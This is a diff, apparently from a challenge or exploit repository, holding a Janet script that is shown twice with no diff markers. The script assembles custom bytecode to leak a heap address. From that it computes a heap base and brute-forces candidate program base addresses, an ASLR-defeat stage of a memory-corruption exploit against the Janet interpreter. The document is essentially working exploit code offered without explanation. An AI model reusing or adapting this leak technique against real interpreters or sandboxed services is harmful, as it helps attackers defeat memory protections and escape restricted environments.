lionaneesh · April 1, 2021 03:44
diff --git a/replme_janet_programbase.janet b/replme_janet_programbase.janet
 (def some
 (asm
 '{
  constants @["blah" print]
  :arity 0
  slotcount 2
  bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
 }
 ))

 (def- leak_tup (some))
 (print leak_tup)
 (def- leak_str (describe leak_tup))
 (def leak_addr (string/trim leak_str "<>array "))
 (def leak_addr1 (string/slice leak_addr 2 6))
 (def leak_addr2 (string/slice leak_addr 6 14))
 (def hex_p "0x")
 (print  leak_addr)
 (print leak_addr1)
 (print leak_addr2)
 (def leak_addr2h (string/join [hex_p leak_addr2]))
 (def leak_addr1h (string/join [hex_p leak_addr1]))
 (print leak_addr2h)
 (print leak_addr1h)

 (def leak_addr1i (scan-number leak_addr1h))
 (def leak_addr2i (scan-number leak_addr2h))
 (def leak_heap_ptr2 (- leak_addr2i 216656))

 (def- buffer (tarray/buffer 8))
 (def- buffleak2 (buffer/new 16))
 (def- progleak (buffer/new 16))
 (buffer/format buffleak2 "0x%x%x" leak_addr1i leak_heap_ptr2)

 (print "heapbase")
 (print buffleak2)
 (def leak_pre (string/slice buffleak2 2 7))
 (def leak_suf (string/slice buffleak2 11 14))
 (def leak_preh (string/join [hex_p leak_pre]))
 (def leak_sufh (string/join [hex_p leak_suf]))
 (def leak_prei (scan-number leak_preh))
 (def leak_sufi (scan-number leak_sufh))
 (var found nil)
 (loop [leak_mid :range [0x0 0xffff]
       :until (not= found nil)
 ]
 (def- buffleak3 (buffer/new 16))
 (buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi)
 (print buffleak3)
 (def leak_prog_1 (string/slice buffleak3 2 8))
 (def leak_prog_1h (string/join [hex_p leak_prog_1]))
 (def leak_prog_1i (scan-number leak_prog_1h))
 (def leak_prog_2 (string/slice buffleak3 8 14))
 (def leak_prog_2h (string/join [hex_p leak_prog_2]))
 (def leak_prog_2i (scan-number leak_prog_2h))
 (def leak_prog_f (buffer/new 16))
 (buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2i)
 (print "possible program base addr")
 (print leak_prog_f)
 )
 (os/sleep 200)
	(def some
	(asm
	'{
	constants @["blah" print]
	:arity 0
	slotcount 2
	bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
	}
	))

	(def- leak_tup (some))
	(print leak_tup)
	(def- leak_str (describe leak_tup))
	(def leak_addr (string/trim leak_str "<>array "))
	(def leak_addr1 (string/slice leak_addr 2 6))
	(def leak_addr2 (string/slice leak_addr 6 14))
	(def hex_p "0x")
	(print leak_addr)
	(print leak_addr1)
	(print leak_addr2)
	(def leak_addr2h (string/join [hex_p leak_addr2]))
	(def leak_addr1h (string/join [hex_p leak_addr1]))
	(print leak_addr2h)
	(print leak_addr1h)

	(def leak_addr1i (scan-number leak_addr1h))
	(def leak_addr2i (scan-number leak_addr2h))
	(def leak_heap_ptr2 (- leak_addr2i 216656))

	(def- buffer (tarray/buffer 8))
	(def- buffleak2 (buffer/new 16))
	(def- progleak (buffer/new 16))
	(buffer/format buffleak2 "0x%x%x" leak_addr1i leak_heap_ptr2)

	(print "heapbase")
	(print buffleak2)
	(def leak_pre (string/slice buffleak2 2 7))
	(def leak_suf (string/slice buffleak2 11 14))
	(def leak_preh (string/join [hex_p leak_pre]))
	(def leak_sufh (string/join [hex_p leak_suf]))
	(def leak_prei (scan-number leak_preh))
	(def leak_sufi (scan-number leak_sufh))
	(var found nil)
	(loop [leak_mid :range [0x0 0xffff]
	:until (not= found nil)
	]
	(def- buffleak3 (buffer/new 16))
	(buffer/format buffleak3 "0x%x%.4x%.3x" leak_prei leak_mid leak_sufi)
	(print buffleak3)
	(def leak_prog_1 (string/slice buffleak3 2 8))
	(def leak_prog_1h (string/join [hex_p leak_prog_1]))
	(def leak_prog_1i (scan-number leak_prog_1h))
	(def leak_prog_2 (string/slice buffleak3 8 14))
	(def leak_prog_2h (string/join [hex_p leak_prog_2]))
	(def leak_prog_2i (scan-number leak_prog_2h))
	(def leak_prog_f (buffer/new 16))
	(buffer/format leak_prog_f "0x%x%.6x" leak_prog_1i leak_prog_2i)
	(print "possible program base addr")
	(print leak_prog_f)
	)
	(os/sleep 200)